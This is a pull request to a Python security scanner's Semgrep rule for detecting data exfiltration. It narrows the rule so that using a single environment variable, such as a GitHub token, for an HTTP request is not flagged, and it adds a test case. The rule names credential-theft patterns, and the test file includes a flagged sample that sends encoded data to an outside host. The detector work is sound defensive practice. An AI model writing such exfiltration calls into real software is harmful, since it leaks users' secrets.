### PR TITLE
Don't match on Python code performing HTTP requests when it uses a single environment variable

### DIFF
--- a/pysecurity/source_code_analysis/semgrep/exfiltrate-sensitive-data.yml
+++ b/pysecurity/source_code_analysis/semgrep/exfiltrate-sensitive-data.yml
@@ -4,7 +4,6 @@ rules:
   pattern-sources:
     - patterns:
         - pattern-either:
-          - pattern: os.environ
           - pattern: os.environ.items()
           - pattern: '[... for ... in os.environ.items()]'
           - pattern: socket.gethostname()
@@ -21,6 +20,7 @@ rules:
             - pattern-either:
                 - pattern: os.getenv($ENVVAR)
                 - pattern: os.environ[$ENVVAR]
+                - pattern: os.environ.get($ENVVAR)
             - metavariable-regex:
                 metavariable: $ENVVAR
                 regex: \"(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)\"

--- a/semgrep_tests/exfiltrate-sensitive-data.py
+++ b/semgrep_tests/exfiltrate-sensitive-data.py
@@ -98,3 +98,12 @@ def checkVersion():
         # ruleid: exfiltrate-sensitive-information
         urllib.urlopen(r'http://openvc.org/Version.php','vid='+base64.encodestring(vid))
 checkVersion()
+
+
+
+
+
+
+# Should not match as we only use a single env variable
+# ok: exfiltrate-sensitive-information
+requests.get("foo", auth=(os.environ['GH_TOKEN'], 'x-oauth-basic'))


### PR DESCRIPTION
Rationale: a lot of legitimate code might use things like:

```
requests.post("https://github.com/api/xxx", auth=(os.environ.get("GITHUB_TOKEN"), "xxx"))
```

I think it makes sense to exclude this use-cases, as malicious code would typically either steal all environment variables, or steal specifically sensitive ones (e.g. AWS credentials) that we explicitly call out